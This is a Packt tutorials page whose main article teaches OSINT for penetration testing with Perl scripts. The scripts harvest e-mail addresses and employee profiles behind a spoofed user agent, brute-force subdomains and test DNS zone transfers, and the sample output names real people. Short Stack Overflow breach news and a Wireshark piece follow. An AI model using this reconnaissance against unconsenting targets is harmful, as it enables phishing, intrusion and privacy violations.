Search icon CANCEL
Subscription
0
Cart icon
Your Cart (0 item)
Close icon
You have no products in your basket yet
Save more on your purchases! discount-offer-chevron-icon
Savings automatically calculated. No voucher code required.
Arrow left icon
Explore Products
Best Sellers
New Releases
Books
Videos
Audiobooks
Learning Hub
Newsletter Hub
Free Learning
Arrow right icon
timer SALE ENDS IN
0 Days
:
00 Hours
:
00 Minutes
:
00 Seconds

How-To Tutorials - Security

174 Articles
article-image-open-source-intelligence
Packt
30 Dec 2014
30 min read
Save for later

Open Source Intelligence

Packt
30 Dec 2014
30 min read
This article is written by Douglas Berdeaux, the author of Penetration Testing with Perl. Open source intelligence (OSINT) refers to intelligence gathering from open and public sources. These sources include search engines, the client target's web-accessible software or sites, social media sites and forums, Internet routing and naming authorities, public information sites, and more. If done properly and thoroughly, the practice of OSINT can prove to be useful to strengthen social engineering and remote exploitation attacks on our client target as we search for ways to gain access to their systems and buildings during a penetration test. What's covered In this article, we will cover how to gather the information listed using Perl: E-mail addresses from our client target using search engines and social media sites Networking, hosting, routing, and system data of our client target using online resources and simple networking utilities To gather this data, we rely heavily on the LWP::UserAgent Perl module. We will also discover how to use this module with a secured socket layer SSL/TLS (HTTPS) connection. In addition to this, we will learn about a few new Perl modules that are listed here: Net::Whois::Raw Net::DNS::Dig Net::DNS Net::Traceroute XML::LibXML Google dorks Before we use Google for intelligence gathering, we should briefly touch upon using Google dorks, which we can use to refine and filter our Google searches. A Google dork is a string of special syntax that we pass to Google's request handler using the q= option. The dork can comprise operators and keywords separated by a colon and concatenated strings using a plus symbol + as a delimiter. Here is a list of simple Google dorks that we can use to narrow our Google searches: intitle:<string> searches for pages whose HTML title tags contain the string <string> filetype:<ext> searches for files that have the extension <ext> site:<domain> narrows the search to only results that are located on the <domain> target servers inurl:<string> returns results that contain <string> in their URL -<word> negates the word following the minus symbol - in a search filter link:<page> searches for pages that contain the HTML HREF links to the page This is just a small list and a complete guide of Google search operators that can be found on their support servers. A list of well-known exploited Google dorks for information gathering can be found in a Google hacker's database at http://www.exploit-db.com/google-dorks/. E-mail address gathering Getting e-mail addresses from our target can be a rather hard task and can also mean gathering usernames used within the target's domain, remote management systems, databases, workstations, web applications, and much more. As we can imagine, gathering a username is 50 percent of the intrusion for target credential harvesting; the other 50 percent being the password information. So how do we gather e-mail addresses from a target? Well, there are several methods; the first we will look at will be simply using search engines to crawl the web for anything useful, including forum posts, social media, e-mail lists for support, web pages and mailto links, and anything else that was cached or found from ever-spidering search engines. Using Google for e-mail address gathering Automating queries to search engines is usually always best left to application programming interfaces (APIs). We might be able to query the search engine via a simple GET request, but this leaves enough room for error, and the search engine can potentially temporarily block our IP address or force us to validate our humanness using an image of words as it might assume that we are using a bot. Unfortunately, Google only offers a paid version of their general search API. They do, however, offer an API for a custom search, but this is restricted to specified domains. We want to be as thorough as possible and search as much of the web as we can, time permitting, when intelligence gathering. Let's go back to our LWP::UserAgent Perl module and make a simple request to Google, searching for any e-mail addresses and URLs from a given domain. The URLs are useful as they can be spidered to within our application if we feel inclined to extend the reach of our automated OSINT. In the following examples, we want to impersonate a browser as much as possible to not raise flags at Google by using automation. We accomplish this by using the LWP::UserAgent Perl module and spoofing a valid Firefox user agent: #!/usr/bin/perl -w use strict; use LWP::UserAgent; use LWP::Protocol::https; my $usage = "Usage ./email_google.pl <domain>"; my $target = shift or die $usage; my $ua = LWP::UserAgent->new; my %emails = (); # unique my $url = 'https://www.google.com/search?num=100&start=0&hl=en&meta=&q=%40%22'.$target.'%22'; $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 6.1 en-US; rv:1.9.2.18) Gecko/20110614 Firefox/3.6.18"); $ua->timeout(10); # setup a timeout $ua->show_progress(1); # display progress bar my $res = $ua->get($url); if($res->is_success){ my @urls = split(/url?q=/,$res->as_string); foreach my $gUrl (@urls){ # Google URLs next if($gUrl =~ m/(webcache.googleusercontent)/i or not $gUrl =~ m/^http/); $gUrl =~ s/&amp;sa=U.*//; print $gUrl,"n"; } my @emails = $res->as_string =~ m/[a-z0-9_.-]+@/ig; foreach my $email (@emails){ if(not exists $emails{$email}){    print "Possible Email Match: ",$email,$target,"n";    $emails{$email} = 1; # hashes are faster } } } else{ die $res->status_line; } The LWP::UserAgent module used in the previous code is not new to us. We did, however, add SSL support using the LWP::Protocol::https module. Our URL $url object is a simple Google search URL that anyone would browse to with a normal browser. The num= value pertains the returned results from Google in a single page, which we have set to 100. To also act as a browser, we needed to set the user agent with the agent() method, which we did as a Mozilla browser. After this, we set a timeout and Boolean to show a simple progress bar. The rest is just simple Perl string manipulation and pattern matching. We use the regular expression url?q= to split the string returned by the as_string method from the $res object. Then, for each URL string, we use another regular expression, &amp;sa=U.*, to remove excess analytic garbage that Google adds. Then, we simply parse out all e-mail addresses found using the same method but different regexp. We stuff all matches into the @emails array and loop over them, displaying them to our screen if they don't exist in the $emails{} Perl hash. Let's run this program against the weaknetlabs.com domain and analyze the output: root@wnld960:~# perl email_google.pl weaknetlabs.com ** GET https://www.google.com/search?num=100&start=0&hl=en&meta=&q=%40%22weaknetlabs.com%22 ==> 200 OK (1s) http://weaknetlabs.com/ http://weaknetlabs.com/main/%3Fpage_id%3D479 … http://www.securitytube.net/video/2039 Possible Email Match: Douglas@weaknetlabs.com Possible Email Match: weaknetlabs@weaknetlabs.com root@wnld960:~# This is the (trimmed) output when we run an automated Google search for an e-mail address from weaknetlabs.com. Using social media for e-mail address gathering Now, let's turn our attention to using social media sites such as Google+, LinkedIn, and Facebook to try to gather e-mail addresses using Perl. Social media sites can sometimes reflect information about an employee's attitude towards their employer, their status within the company, position, e-mail addresses, and more. All of this information is considered OSINT and can be useful when advancing our attacks. Google+ We can also search plus.google.com for contact information from users belonging to our target. The following is the URL-encoded Google dork we will use to search the Google+ profiles for an employee of our target: intitle%3A"About+-+Google%2B"+"Works+at+'.$target.'"+site%3Aplus.google.com The URL-encoded symbols are as follows: %3A: This is a colon, that is, : %2B: This is a plus symbol, that is, + The plus symbol + is a special component of Google dork, as we mentioned in the previous section. The intitle keyword tells Google to display results whose HTML <title> tag contains the About – Google+ text. Then, we add the string (in quotations) "Works at " (notice the space at the end), and then the target name as the string object $target. The site keyword tells the Google search engine to only display results from the plus.google.com site. Let's implement this in our Perl program and see what results are returned for Google employees: #!/usr/bin/perl -w use strict; use LWP::UserAgent; use LWP::Protocol::https; my $ua = LWP::UserAgent->new; my $usage = "Usage ./googleplus.pl <target name>"; my $target = shift or die $usage; $target =~ s/s/+/g; my $gUrl = 'https://www.google.com/search?safe=off&noj=1&sclient=psy-ab&q=intitle%3A"About+-+Google%2B"+"Works+at+' .$target.'"+site%3Aplus.google.com&oq=intitle%3A"About+-+Google%2B"+"Works+at+'.$target.'"+site%3Aplus.google.com'; $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 6.1 en-US; rv:1.9.2.18) Gecko/20110614 Firefox/3.6.18"); $ua->timeout(10); # setup a timeout my $res = $ua->get($gUrl); if($res->is_success){ foreach my $string (split(/url?q=/,$res->as_string)){ next if($string =~ m/(webcache.googleusercontent)/i or not $string =~ m/^http/); $string =~ s/&amp;sa=U.*//; print $string,"n"; } } else{ die $res->status_line; } This Perl program is quite similar to our last search program. Now, let's run this to find possible Google employees. Since a target client company can have spaces in its name, we accommodate them by encoding them for Google as plus symbols: root@wnld960:~# perl googleplus.pl google https://plus.google.com/%2BPaulWilcox/about https://plus.google.com/%2BNatalieVillalobos/about ... https://plus.google.com/%2BAndrewGerrand/about root@wnld960:~# The preceding (trimmed) output proves that our Perl script works as we browse to the returned results. These two Google search scripts provided us with some great information quickly. Let's move on to another example, not using Google but LinkedIn, a social media site for professionals. LinkedIn LinkedIn can provide us with the contact information and IT skill levels of our client target during a penetration test. Here, we will focus on the contact information. By now, we should feel very comfortable making any type of web request using LWP::UserAgent and parsing its output for intelligence data. In fact, this LinkedIn example should be a breeze. The trick is fine-tuning our filters and regular expressions to get only relevant data. Let's just dive right into the code and then analyze some sample output: #!/usr/bin/perl -w use strict; use LWP::UserAgent; use LWP::Protocol::https; my $ua = LWP::UserAgent->new; my $usage = "Usage ./googlepluslinkedin.pl <target name>"; my $target = shift or die $usage; my $gUrl = 'https://www.google.com/search?q=site:linkedin.com+%22at+'.$target.'%22'; my %lTargets = (); # unique $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 6.1 en-US; rv:1.9.2.18) Gecko/20110614 Firefox/3.6.18"); $ua->timeout(10); # setup a timeout my $google = getUrl($gUrl); # one and ONLY call to Google foreach my $title ($google =~ m/shref="/url?.*">[a-z0-9_. -]+s?.b.at $target..b.s-slinked/ig){ my $lRurl = $title; $title =~ s/.*">([^<]+).*/$1/; $lRurl =~ s/.*url?.*q=(.*)&amp;sa.*/$1/; print $title,"-> ".$lRurl."n"; my @ln = split(/15?12/,getUrl($lRurl)); foreach(@ln){ if(m/title="/i){    my $link = $_;    $link =~ s/.*href="([^"]+)".*/$1/;    next if exists $lTargets{$link};    $lTargets{$link} = 1;    my $name = $_;    $name =~ s/.*title="([^"]+)".*/$1/;    print "t",$name," : ",$link,"n"; } } } sub getUrl{ sleep 1; # pause... my $res = $ua->get(shift); if($res->is_success){ return $res->as_string; }else{ die $res->status_line; } } The preceding Perl program makes one query to Google to find all possible positions from the target; for each position found, it queries LinkedIn to find employees of the target. The regular expressions used were finely crafted after inspection of the returned HTML object from a simple query to both Google and LinkedIn. This is a great example of how we can spider off from our initial Google results to gather even more intelligence using Perl automation. Let's take a look at some sample outputs from this program when used against Walmart.com: root@wnld960:~# perl linkedIn.pl Walmart Buyer : http://www.linkedin.com/title/buyer/at-walmart/        Jason Kloster : http://www.linkedin.com/in/jasonkloster       Rajiv Ahirwal : http://www.linkedin.com/in/rajivahirwal ... Store manager : http://www.linkedin.com/title/store%2Bmanager/at-walmart/        Benjamin Hunt 13k+ (LION) #1 Connected Leader at Walmart : http://www.linkedin.com/in/benjaminhunt01 ... Shift manager : http://www.linkedin.com/title/shift%2Bmanager/at-walmart/        Frank Burns : http://www.linkedin.com/pub/frank-burns/24/83b/285 ... Assistant store manager : http://www.linkedin.com/title/assistant%2Bstore%2Bmanager/at-walmart/        John Cole : http://www.linkedin.com/pub/john-cole/67/392/b39        Crystal Herrera : http://www.linkedin.com/pub/crystal-herrera/92/74a/97b root@wnld960:~# The preceding (trimmed) output provided some great insight into employee positions, and even real employees in those positions of the target, with a simple call to one script. All of this information is publicly available information and we are not directly attacking Walmart or its employees; we are just using this as an example of intelligence-gathering techniques during a penetration test using Perl programming. This information can further be used for reporting, and we can even extend this data into other areas of research. For instance, we can easily follow the LinkedIn links with LWP::UserAgent and pull even more data from the publicly available LinkedIn profiles. This data, when compared to Google+ profile data and simple Google searches, should help in providing a background to create a more believable pretext for social engineering. Now, let's see if we can use Google to search more social media websites for information on our client target. Facebook We can easily argue that Facebook is one of the largest social networking sites around during the writing of this book. Facebook can easily return a large amount of data about a person, and we don't even have to go to the site to get it! We can easily extend our reach into the Web with the gathered employee names, from our previous code, by searching Google using the site:faceboook.com parameter and the exact same syntax as from the first example in the Google section of the E-mail address gathering section. The following are a few simple Google dorks that can possibly reveal information about our client target: site:facebook.com "manager at target" site:facebook.com "ceo at target" site:facebook.com "owner of target" site:facebook.com "experience at target" This information can return customer and employee criticism that can be used for a wide array of penetration-testing purposes, including social engineering pretexting. We can narrow our focus even further by adding other keywords and strings from our previously gathered intelligence, such as city names, company names, and more. Just about anything returned can be compiled into a unique wordlist for password cracking, and contrasted with the known data with Digital Credential Analysis (DCA). Domain Name Services Domain Name Services (DNS) are used to translate IP addresses into hostnames so that we can use alphanumeric addresses instead of IP addresses for websites or services. It makes our lives a lot easier when typing in a URL with a name rather than a 4-byte numerical value. Any client target can potentially have full control over their naming services. DNS A records can be assigned to any IP address. We can easily write our own record with domain control for an IPv4 class A address, such as 10.0.0.1, which is commonly done for an internal network to allow its users to easily connect to different internal services. The Whois query Sometimes, when we can get an IP address for a client target, we can pass this IP address to the Whois database, and in return, we can get a range of IP addresses in which our IP lies and the organization that owns the range. If the organization is our target, then we now know a range of IP addresses pointing directly to their resources. Usually, this information is given during a penetration test, and the limitations on the lengths that we are allowed to go to for IP ranges are set so that we can be limited simply to reporting. Let's use Perl and the Net::Whois::Raw module to interact with the American Registry for Internet Numbers (ARIN) database for an IP address: #!/usr/bin/perl -w use strict; use Net::Whois::Raw; die "Usage: perl netRange.pl <IP Address>" unless $ARGV[0]; foreach(split(/n/,whois(shift))){ print $_,"n" if(m/^(netrange|orgname)/i); } The preceding code, when run, should produce information about the network range and organization name that owns the range. It is very simple, and it can be compared to calling the whois program form the Linux command line. If we were to script this to run through a number of different IP addresses and run the Whois query against each one, we could be violating the terms of service set by ARIN. Let's test it and see what we get with a random IP address: root@wnld960:~# perl whois.pl 198.123.2.22 NetRange:       198.116.0.0 - 198.123.255.255 OrgName:       National Aeronautics and Space Administration root@wnld960:~# This is the output from our Perl program, which reveals an IP range that can belong to the organization listed. If this fails, and we need to find more than one hostname owned by our client target, we can try a brute force method that simply checks our name servers; we will do just that in the next section. The DIG query DIG stands for domain information groper and is a utility to do just that using DNS queries. The DIG Linux utility has actually replaced the older host and nslookup. In making these queries, one thing to note is that when we don't specify a name server to use, the DIG utility will simply use the Linux OS default resolver. We can, however, pass a name server to DIG; we will cover this in the upcoming section, Zone transfers. There is a nice object-oriented Perl module for DIG that we will examine, which is called Net::DNS::Dig. Let's quickly look at an example to query our DNS with this module: #!/usr/bin/perl -w use Net::DNS::Dig; use strict; my $dig = new Net::DNS::Dig(); my $dom = shift or die "Usage: perl dig.pl <domain>"; my $dobj = $dig->for($dom, 'A'); # print $dobj->sprintf; # print entire dig query response print "CODE: ",$dobj->rcode(1),"n"; # Dig Response Code my %mx = Net::DNS::Dig->new()->for($dom,'MX')->rdata(); while(my($val,$server) = each(%mx)){ print "MX: ",$server," - ",$val,"n"; } The preceding code is simple. We create a DIG object $dig and call the for() method, passing the domain name we pulled by shifting the command-line arguments and types for A records. We print the returned response with sprintf(), and then the response code alone with the rcode() method. Finally, we create a hash object %mx from the rdata() method. We pass the rdata() object returned from making a new Net::DNS::Dig object, and call the for() method on it with a type of MX for the mail server. Let's try this against a domain and see what is returned: root@wnld960:~# perl dig.pl weaknetlabs.com ; <<>> Net::DNS::Dig 0.12 <<>> -t a weaknetlabs.com. ;; ;; Got answer. ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 34071 ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0 ;; QUESTION SECTION: ;weaknetlabs.com.               IN     A ;; ANSWER SECTION: weaknetlabs.com.       300    IN     A       198.144.36.192 ;; Query time: 118 ms ;; SERVER: 75.75.76.76# 53(75.75.76.76) ;; WHEN: Mon May 19 18:26:31 2014 ;; MSG SIZE rcvd: 49 -- XFR size: 2 records CODE: NOERROR MX: mailstore1.secureserver.net - 10 MX: smtp.secureserver.net – 0 The output is just as expected. Everything above the line starting with CODE is the response from making the DIG query. CODE is returned from the rcode() method. Since we passed a true value to rcode(), we got a string type, NOERROR, returned. Next, we printed the key and value pairs of the %mx Perl hash, which displayed our target's e-mail server names. Brute force enumeration Keeping the previous lesson in mind, and knowing that Linux offers a great wealth of networking utilities, we might be inclined to write our own DNS brute force tool to enumerate any possible A records that our client target could have made prior to our penetration test. Let's take a quick look at the nslookup utility we can use to check if a record exists: trevelyn@wnld960:~$ nslookup admin.warcarrier.org Server:         75.75.76.76 Address:       75.75.76.76#53 Non-authoritative answer: Name:   admin.warcarrier.org Address: 10.0.0.1 trevelyn@wnld960:~$ nslookup admindoesntexist.warcarrier.org Server:         75.75.76.76 Address:        75.75.76.76#53 ** server can't find admindoesntexist.warcarrier.org: NXDOMAIN trevelyn@wnld960:~$ This is the output of two calls to nslookup, the networking utility used for returning IP addresses of hostnames, and vice versa. The first A record check was successful, and the second, the admindoesntexist subdomain, was not. We can easily see from the output of this program how we can parse it to check whether the subdomain exists. We can also see from the two subdomains that we can use a simple word list of commonly used subdomains for efficiency, before trying many possible combinations. A lot of intelligence gathering might have already been done for you by search engines such as Google. In fact, the keyword search site: can return more than just the www subdomains. If we broaden our num= URL GET parameter and loop through all possible results by incrementing the start= parameter, we can potentially get results from other subdomains of our target. Now that we have seen the basic query for a subdomain, let's turn our focus to use Perl and a new Perl module, Net::DNS, to enumerate a few subdomains: #!/usr/bin/perl -w use strict; use Net::DNS; my $dns = Net::DNS::Resolver->new; my @subDomains = ("admin","admindoesntexist","www","mail","download","gateway"); my $usage = "perl domainbf.pl <domain name>"; my $domain = shift or die $usage; my $total = 0; dns($_) foreach(@subDomains); print $total," records testedn"; sub dns{ # search sub domains: $total++; # record count my $hn = shift.".".$domain; # construct hostname my $dnsLookup = $dns->search($hn); if($dnsLookup){ # successful lookup my $t=0; foreach my $ip ($dnsLookup->answer){    return unless $ip->type eq "A" and $t<1; # A records    print $hn,": ",$ip->address,"n"; # just the IP    $t++; } } return; } The preceding Perl program loops through the @domains array and calls the dns() subroutine on each, which returns or prints a successful query. The $t integer token is used for subdomains, which has several identical records to avoid repetition in the program's output. After this, we simply print the total of the records tested. This program can be easily modified to open a word list file, and we can loop through each by passing them to the dns() subroutine, with something similar to the following: open(FLE,"file.txt"); while(<FLE>){ dns($_); } Zone transfers As we have seen with an A record, the admin.warcarrier.org entry provided us with some insight as to the IP range of the internal network, or the class A address 10.0.0.1. Sometimes, when a client target is controlling and hosting their own name servers, they accidentally allow DNS zone transfers from their name servers into public name servers, providing the attacker with information where the target's resources are. Let's use the Linux host utility to check for a DNS zone transfer: [trevelyn@shell ~]$ host -la warcarrier.org beth.ns.cloudflare.com Trying "warcarrier.org" Using domain server: Name: beth.ns.cloudflare.com Address: 2400:cb00:2049:1::adf5:3a67#53 Aliases: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 20461 ;; flags: qr aa; QUERY: 1, ANSWER: 13, AUTHORITY: 0, ADDITIONAL: 0 ;; QUESTION SECTION: ; warcarrier.org.           IN     AXFR ;; ANSWER SECTION: warcarrier.org.     300     IN     SOA     beth.ns.cloudflare.com. warcarrier.org. beth.ns.cloudflare.com. 2014011513 18000 3600 86400 1800 warcarrier.org.     300     IN     NS     beth.ns.cloudflare.com. warcarrier.org.     300     IN     NS     hank.ns.cloudflare.com. warcarrier.org.     300     IN     A      50.97.177.66 admin.warcarrier.org. 300     IN     A       10.0.0.1 gateway.warcarrier.org. 300 IN   A       10.0.0.124 remote.warcarrier.org. 300     IN     A       10.0.0.15 partner.warcarrier.org. 300 IN   CNAME   warcarrier.weaknetlabs.com. calendar.warcarrier.org. 300 IN   CNAME   login.secureserver.net. direct.warcarrier.org. 300 IN   CNAME   warcarrier.org. warcarrier.org.     300     IN     SOA     beth.ns.cloudflare.com. warcarrier.org. beth.ns.cloudflare.com. 2014011513 18000 3600 86400 1800 Received 401 bytes from 2400:cb00:2049:1::adf5:3a67#53 in 56 ms [trevelyn@shell ~]$ As we see from the output of the host command, we have found a successful DNS zone transfer, which provided us with even more hostnames used by our client target. This attack has provided us with a few CNAME records, which are used as aliases to other servers owned or used by our target, the subnet (class A) IP addresses used by the target, and even the name servers used. We can also see that the default name, direct, used by CloudFlare.com is still set for the cloud service to allow connections directly to the IP of warcarrier.org, which we can use to bypass the cloud service. The host command requires the name server, in our case beth.ns.cloudflare.com, before performing the transfer. What this means for us is that we will need the name server information before querying for a potential DNS zone transfer in our Perl programs. Let's see how we can use Net::DNS for the entire process: #!/usr/bin/perl -w use strict; use Net::DNS; my $usage = "perl dnsZt.pl <domain name>"; die $usage unless my $dom = shift; my $res = Net::DNS::Resolver->new; # dns object my $query = $res->query($dom,"NS"); # query method call for nameservers if($query){ # query of NS was successful foreach my $rr (grep{$_->type eq 'NS'} $query->answer){ $res->nameservers($rr->nsdname); # set the name server print "[>] Testing NS Server: ".$rr->nsdname."n"; my @subdomains = $res->axfr($dom); if ($#subdomains > 0){    print "[!] Successful zone transfer:n";    foreach (@subdomains){    print $_->name."n"; # returns a Net::DNS::RR object    } }else{ # 0 returned domains    print "[>] Transfer failed on " . $rr->nsdname . "n"; } } }else{ # Something went wrong: warn "query failed: ", $res->errorstring,"n"; } The preceding program that uses the Net::DNS Perl module will first query for the name servers used by our target and then test the DNS zone transfer for each target. The grep() function returns a list to the foreach() loop of all name servers (NS) found. The foreach() loop then simply attempts the DNS zone transfer (AXFR) and returns the results if the array is larger than zero elements. Let's test the output on our client target: [trevelyn@shell ~]$ perl dnsZt.pl warcarrier.org [>] Testing NS Server: hank.ns.cloudflare.com [!] Successful zone transfer: warcarrier.org warcarrier.org admin.warcarrier.org gateway.warcarrier.org remote.warcarrier.org partner.warcarrier.org calendar.warcarrier.org direct.warcarrier.org [>] Testing NS Server: beth.ns.cloudflare.com [>] Transfer failed on beth.ns.cloudflare.com [trevelyn@shell ~]$ The preceding (trimmed) output is a successful DNS zone transfer on one of the name servers used by our client target. Traceroute With knowledge of how to glean hostnames and IP addresses from simple queries using Perl, we can take the OSINT a step further and trace our route to the hosts to see what potential target-owned hardware can intercept or relay traffic. For this task, we will use the Net::Traceroute Perl module. Let's take a look at how we can get the IP host information from relaying hosts between us and our target, using this Perl module and the following code: #!/usr/bin/perl -w use strict; use Net::Traceroute; my $dom = shift or die "Usage: perl tracert.pl <domain>"; print "Tracing route to ",$dom,"n"; my $tr = Net::Traceroute->new(host=>$dom,use_tcp=>1); for(my$i=1;$i<=$tr->hops;$i++){        my $hop = $tr->hop_query_host($i,0);        print "IP: ",$hop," hop time: ",$tr->hop_query_time($i,0),               "ms hop status: ",$tr->hop_query_stat($i,0),                " query count: ",$tr->hop_queries($i),"n" if($hop); } In the preceding Perl program, we used the Net::Traceroute Perl module to perform a trace route to the domain given by a command-line argument. The module must be used by first calling the new() method, which we do when defining $tr as a query object. We tell the trace route object $tr that we want to use TCP and also pass the host, which we shift from the command-line arguments. We can pass a lot more parameters to the new() method, one of which is debug=>9 to debug our trace route. A full list can be obtained from the CPAN Search page of the Perl module that can be accessed at http://search.cpan.org/~hag/Net-Traceroute/Traceroute.pm. The hops method is used when constructing the for() loop, which returns an integer value of the hop count. We then assign this to $i and loop through all hop and print statistics, using the methods hop_query_host for the IP address of the host, hop_query_time for the time taken to reach the host, and hop_query_stat that returns the status of the query as an integer value (on our lab machines, it is returned in milliseconds), which can be mapped to the export list of Net::Traceroute according to the module's documentation. Now, let's test this trace route program with a domain and check the output: root@wnld960:~# sudo perl tracert.pl weaknetlabs.com Tracing route to weaknetlabs.com IP: 10.0.0.1 hop time: 0.724ms hop status: 0 query count: 3 IP: 68.85.73.29 hop time: 14.096ms hop status: 0 query count: 3 IP: 69.139.195.37 hop time: 19.173ms hop status: 0 query count: 3 IP: 68.86.94.189 hop time: 31.102ms hop status: 0 query count: 3 IP: 68.86.87.170 hop time: 27.42ms hop status: 0 query count: 3 IP: 50.242.150.186 hop time: 27.808ms hop status: 0 query count: 3 IP: 144.232.20.144 hop time: 33.688ms hop status: 0 query count: 3 IP: 144.232.25.30 hop time: 38.718ms hop status: 0 query count: 3 IP: 144.232.229.46 hop time: 31.242ms hop status: 0 query count: 3 IP: 144.232.9.82 hop time: 99.124ms hop status: 0 query count: 3 IP: 198.144.36.192 hop time: 30.964ms hop status: 0 query count: 3 root@wnld960:~# The output from tracert.pl is just as we expected using the traceroute program of the Linux shell. This functionality can be easily built right into our port scanner application. Shodan Shodan is an online resource that can be used for hardware searching within a specific domain. For instance, a search for hostname:<domain> will provide all the hardware entities found within this specific domain. Shodan is both a public and open source resource for intelligence. Harnessing the full power of Shodan and returning a multipage query is not free. For the examples in this article, the first page of the query results, which are free, were sufficient to provide a suitable amount of information. The returned output is XML, and Perl has some great utilities to parse XML. Luckily, for the purpose of our example, Shodan offers an example query for us to use as export_sample.xml. This XML file contains only one node per host, labeled host. This node contains attributes for the corresponding host and we will use the XML::LibXML::Node class from the XML::LibXML::Node Perl module. First, we will download the XML file and use XML::LibXML to open the local file with the parse_file() method, as shown in the following code: #!/usr/bin/perl -w use strict; use XML::LibXML; my $parser = XML::LibXML->new(); my $doc = $parser->parse_file("export_sample.xml"); foreach my $host ($doc->findnodes('/shodan/host')) { print "Host Found:n"; my @attribs = $host->attributes('/shodan/host'); foreach my $host (@attribs){ # get host attributes print $host =~ m/([^=]+)=.*/," => "; print $host =~ m/.*"([^"]+)"/,"n"; } # next print "nn"; } The preceding Perl program will open the export_sample.xml file and navigate through the host nodes using the simple xpath of /shodan/host. For each <host> node, we call the attribute's method from the XML::LibXML::Node class, which returns an array of all attributes with information such as the IP address, hostname, and more. We then run a regular expression pattern on the $host string to parse out the key, and again with another regexp to get the value. Let's see how this returns data from our sample XML file from ShodanHQ.com: root@wnld960:~#perl shodan.pl Host Found: hostnames => internetdevelopment.ro ip => 109.206.71.21 os => Linux recent 2.4 port => 80 updated => 16.03.2010 Host Found: ip => 113.203.71.21 os => Linux recent 2.4 port => 80 updated => 16.03.2010 Host Found: hostnames => ip-173-201-71-21.ip.secureserver.net ip => 173.201.71.21 os => Linux recent 2.4 port => 80 updated => 16.03.2010 The preceding output is from our shodan.pl Perl program. It loops through all host nodes and prints the attributes. As we can see, Shodan can provide us with some very useful information that we can possibly use to exploit later in our penetration testing. It's also easy to see, without going into elementary Perl coding examples, that we can find exactly what we are looking for from an XML object's attributes using this simple method. We can use this code for other resources as well. More intelligence Gaining information about the actual physical address is also important during a penetration test. Sure, this is public information, but where do we find it? Well, the PTES describes how most states require a legal entity of a company to register with the State Division, which can provide us with a one-stop go-to place for the physical address information, entity ID, service of process agent information, and more. This can be very useful information on our client target. If obtained, we can extend this intelligence by finding out more about the property owners for physical penetration testing and social engineering by checking the city/county's department of land records, real estate, deeds, or even mortgages. All of this data, if hosted on the Web, can be gathered by automated Perl programs, as we did in the example sections of this article using LWP::UserAgent. Summary As we have seen, being creative with our information-gathering techniques can really shine with the power of regular expressions and the ability to spider links. As we learned in the introduction, it's best to do an automated OSINT gathering process along with a manual process because both processes can reveal information that one might have missed. Resources for Article: Further resources on this subject: Ruby and Metasploit Modules [article] Linux Shell Scripting – various recipes to help you [article] Linux Shell Script: Logging Tasks [article]
Read more
  • 0
  • 0
  • 16836

article-image-stack-overflow-confirms-production-systems-hacked
Vincy Davis
17 May 2019
2 min read
Save for later

Stack Overflow confirms production systems hacked

Vincy Davis
17 May 2019
2 min read
Almost after a week of the attack, Stack Overflow admitted in an official security update yesterday, that their production systems has been hacked. “Over the weekend, there was an attack on Stack Overflow. We have confirmed that some level of production access was gained on May 11”, said Mary Ferguson ,VP of Engineering at Stack Overflow. In this short update, the company has mentioned that they are investigating the extent of the access and are addressing all the known vulnerabilities. Though not confirmed, the company has identified no breach of customer or user data. https://twitter.com/gcluley/status/1129260135778607104 Some users are acknowledging the fact that that the firm has at least come forward and accepted the security violation. A user on Reddit said, “Wow. I'm glad they're letting us know early, but this sucks” There are other users who think that security breach due to hacking is very common nowadays. A user on Hacker News commented, “I think we've reached a point where it's safe to say that if you're using a service -any service - assume your data is breached (or willingly given) and accessible to some unknown third party. That third party can be the government, it can be some random marketer or it can be a malicious hacker. Just hope that you have nothing anywhere that may be of interest or value to anyone, anywhere. Good luck.” Few days ago, there were reports that Stack Overflow directly links to Facebook profile pictures. This means that the linking unintentionally allows user activity throughout Stack Exchange to be tracked by Facebook and also tracks the topics that the users are interested in. Read More: Facebook again, caught tracking Stack Overflow user activity and data Stack Overflow has also assured users that more information will be provided to them, once the company concludes the investigation. Stack Overflow survey data further confirms Python’s popularity as it moves above Java in the most used programming language list 2019 Stack Overflow survey: A quick overview Stack Overflow is looking for a new CEO as Joel Spolsky becomes Chairman
Read more
  • 0
  • 0
  • 16586

article-image-wireshark-working-packet-streams
Packt
11 Mar 2013
3 min read
Save for later

Wireshark: Working with Packet Streams

Packt
11 Mar 2013
3 min read
(For more resources related to this topic, see here.) Working with Packet Streams While working on network capture, there can be multiple instances of network activities going on. Consider a small example where you are simultaneously browsing multiple websites through your browser. Several TCP data packets will be flowing across your network for all these multiple websites. So it becomes a bit tedious to track the data packets belonging to a particular stream or session. This is where Follow TCP stream comes into action. Now when you are visiting multiple websites, each site maintains its own stream of data packets. By using the Follow TCP stream option we can apply a filter that locates packets only specific to a particular stream. To view the complete stream, select your preferred TCP packet (for example, a GET or POST request). Right-clicking on it will bring up the option Follow TCP Stream. Once you click on Follow TCP Stream, you will notice that a new filter rule is applied to Wireshark and the main capture window reflects all those data packets that belong to that stream. This can be helpful in figuring out what different requests/responses have been generated through a particular session of network interaction. If you take a closer look at the filter rule applied once you follow a stream, you will see a rule similar to tcp.stream eq <Number>. Here Number reflects the stream number which has to be followed to get various data packets. An additional operation that can be carried out here is to save the data packets belonging to a particular stream. Once you have followed a particular stream, go to File | Save As. Then select Displayed to save only the packets belonging to the viewed stream. Similar to following the TCP stream, we also have the option to follow the UDP and SSL streams. The two options can be reached by selecting the particular protocol type (UDP or SSL) and right-clicking on it. The particular follow option will be highlighted according to the selected protocol. The Wireshark menu icons also provide some quick navigation options to migrate through the captured packets. These icons include: Go back in packet history (1): This option traces you back to the last analyzed/selected packet. Clicking on it multiple times keeps pushing you back to your selection history. Go forward in packet history (2): This option pushes you forward in the series of packet analysis. Go to last packet (5): This option jumps your selection to the last packet in your capture window.: This option is useful in directly going to a specific packet number. Go to the first packet (4): This option takes you to the first packet in your current display of the capture window. Go to last packet (5): This option jumps your selection to the last packet in your capture window. Summary In this article, we learned how to work with packet streams. Resources for Article : Further resources on this subject: BackTrack 5: Advanced WLAN Attacks [Article] BackTrack 5: Attacking the Client [Article] Debugging REST Web Services [Article]
Read more
  • 0
  • 0
  • 16575

article-image-working-forensic-evidence-container-recipes
Packt
07 Mar 2018
13 min read
